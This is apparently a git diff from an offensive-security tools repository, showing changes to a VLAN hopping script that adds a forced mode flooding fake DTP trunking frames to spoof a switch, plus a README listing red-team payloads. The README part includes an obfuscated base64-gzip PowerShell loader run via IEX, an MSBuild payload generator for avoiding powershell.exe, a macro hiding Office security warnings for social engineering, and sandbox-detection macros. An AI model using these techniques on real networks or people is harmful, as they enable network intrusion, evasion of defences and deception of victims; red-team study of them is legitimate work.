diff --git a/networks/VLANHopperDTP.py b/networks/VLANHopperDTP.py old mode 100644 new mode 100755 index 50dd8b5..30f33fb --- a/networks/VLANHopperDTP.py +++ b/networks/VLANHopperDTP.py @@ -274,7 +274,7 @@ def floodTrunkingRequests(): Logger.dbg('SENT: DTP Trunk Keep-Alive:\n{}'.format(frame.summary())) send(frame, iface = config['interface'], verbose = False) - time.sleep(30) + time.sleep(config['timeout'] / 3) def engageDot1qSniffer(): global dot1qSnifferStarted @@ -335,6 +335,17 @@ def processDtps(dtps): attackEngaged = True time.sleep(5) + if config['force']: + Logger.ok('FORCED VLAN Hopping via Switch Spoofing.') + Logger.ok('Flooding with fake Access/Desirable DTP frames...\n') + + t = threading.Thread(target = floodTrunkingRequests) + t.daemon = True + t.start() + + attackEngaged = True + time.sleep(5) + if attackEngaged: engageDot1qSniffer() @@ -385,7 +396,7 @@ def addVlanIface(vlan): tempfiles.append(pidFile) tempfiles.append(dbFile) - Logger.info('So far so good, subinterface {} added.'.format(subif)) + Logger.dbg('So far so good, subinterface {} added.'.format(subif)) ret = False for attempt in range(3): @@ -456,7 +467,7 @@ def sniffThread(): if len(dtps) > 0 or config['force']: if len(dtps) > 0: - Logger.dbg('Got {} DTP frames.\n'.format( + Logger.info('Got {} DTP frames.\n'.format( len(dtps) )) else: @@ -572,6 +583,9 @@ def parseOptions(argv): config['commands'] = args.command config['exitcommands'] = args.exitcommand + if args.force: + config['timeout'] = 30 + return args def main(argv): diff --git a/social-engineering/README.md b/social-engineering/README.md index 1ed19e0..210148d 100644 --- a/social-engineering/README.md +++ b/social-engineering/README.md @@ -14,6 +14,8 @@ $s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd(); ``` +- **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c)) + - **`generateMSBuildPowershellXML.py`** - Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without using `powershell.exe` ([gist](https://gist.github.com/mgeeky/df9f313cfe468e56c59268b958319bcb)) Example output **not minimized**: @@ -101,8 +103,6 @@ ngTask> ------------------------------------------------------------------------------------ ``` -- **`delete-warning-div-macro.vbs`** - VBA Macro function to be used as a Social Engineering trick removing "Enable Content" warning message as the topmost floating text box with given name. ([gist](https://gist.github.com/mgeeky/9cb6acdec31c8a70cc037c84c77a359c)) - - **`Invoke-Command-Cred-Example.ps1`** - Example of using PSRemoting with credentials passed directly from command line. ([gist](https://gist.github.com/mgeeky/de4ecf952ddce774d241b85cfbf97faf)) - **`MacroDetectSandbox.vbs`** - Visual Basic script responsible for detecting Sandbox environments, as presented in modern Trojan Droppers implemented in Macros. ([gist](https://gist.github.com/mgeeky/61e4dfe305ab719e9874ca442779a91d))